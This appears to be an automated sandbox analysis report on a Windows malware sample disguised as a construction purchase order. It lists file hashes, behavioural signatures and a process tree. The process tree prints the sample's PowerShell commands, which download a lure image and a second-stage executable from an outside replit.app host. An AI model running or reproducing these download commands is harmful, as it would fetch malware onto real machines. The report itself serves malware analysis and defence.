Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
30-07-2024 01:19
Static task
static1
Behavioral task
behavioral1
Sample
jdconstructnOrderfdp..exe
Resource
win7-20240704-en
General
-
Target
jdconstructnOrderfdp..exe
-
Size
288KB
-
MD5
7e900eb50f9dc1cb5c68ffea4b9e7bcc
-
SHA1
4dcc14dc2b98fbc171308fb55b5b8551dd96ea96
-
SHA256
8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3
-
SHA512
a77aeffc4f80358940e40789a67f67df5adc1bde4790a400665a98871498b10c3206981d3f18efa1149c9ec246f0343d133dd77de4f5a1f5816506a204276b1a
-
SSDEEP
3072:6q6+ouCpk2mpcWJ0r+QNTBfRuk1qXkXRA4XTZK:6ldk1cWQRNTBpd8t
Malware Config
Signatures
-
Processes:
powershell.exepowershell.exepid process 1100 powershell.exe 2488 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
jdconstructnOrderfdp..exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jdconstructnOrderfdp..exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 1100 powershell.exe 2488 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1100 powershell.exe Token: SeDebugPrivilege 2488 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
jdconstructnOrderfdp..execmd.exedescription pid process target process PID 1720 wrote to memory of 2532 1720 jdconstructnOrderfdp..exe cmd.exe PID 1720 wrote to memory of 2532 1720 jdconstructnOrderfdp..exe cmd.exe PID 1720 wrote to memory of 2532 1720 jdconstructnOrderfdp..exe cmd.exe PID 1720 wrote to memory of 2532 1720 jdconstructnOrderfdp..exe cmd.exe PID 2532 wrote to memory of 1100 2532 cmd.exe powershell.exe PID 2532 wrote to memory of 1100 2532 cmd.exe powershell.exe PID 2532 wrote to memory of 1100 2532 cmd.exe powershell.exe PID 2532 wrote to memory of 2488 2532 cmd.exe powershell.exe PID 2532 wrote to memory of 2488 2532 cmd.exe powershell.exe PID 2532 wrote to memory of 2488 2532 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C0EF.tmp\C0F0.tmp\C0F1.bat C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2532 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1100 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/networkrunfdp.exe' -OutFile networkrunfdp.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2488
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
334B
MD59aaac0122442ca0ebb4d8bb795e86676
SHA1594744d8e4d51273dd435c3fac5799bc5f180e8c
SHA2566af7e75e339241dac26eca99aa1290c1f420b45b4231212d20adf08aa287e373
SHA512d08a0dd3b40d80c7582c3f69a7868371e7eb03ac6f4658a39e7a9fb1dd34cc22a5e91d60b31af71c77cebfe0fd0c3827fdbb3cc35224189388345c61e756636c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD51a584b347be98003da08bae1e0e9a2c8
SHA1233f831a5c1fbbc67ee5b84dfd2f26644d94cb25
SHA256d94062ddb6c8e257ca866fcb229fd7bc2b82e89244a2e05ab052f943a333b7e2
SHA51207d7c92a2900c9b94109216a59cf4c5a1b2b2c791b30c88f4ade37b782c59f8fcf5d46b3ec22965aea5e12c4acf0e764d05ec312b332826130deaa0c8ef443c2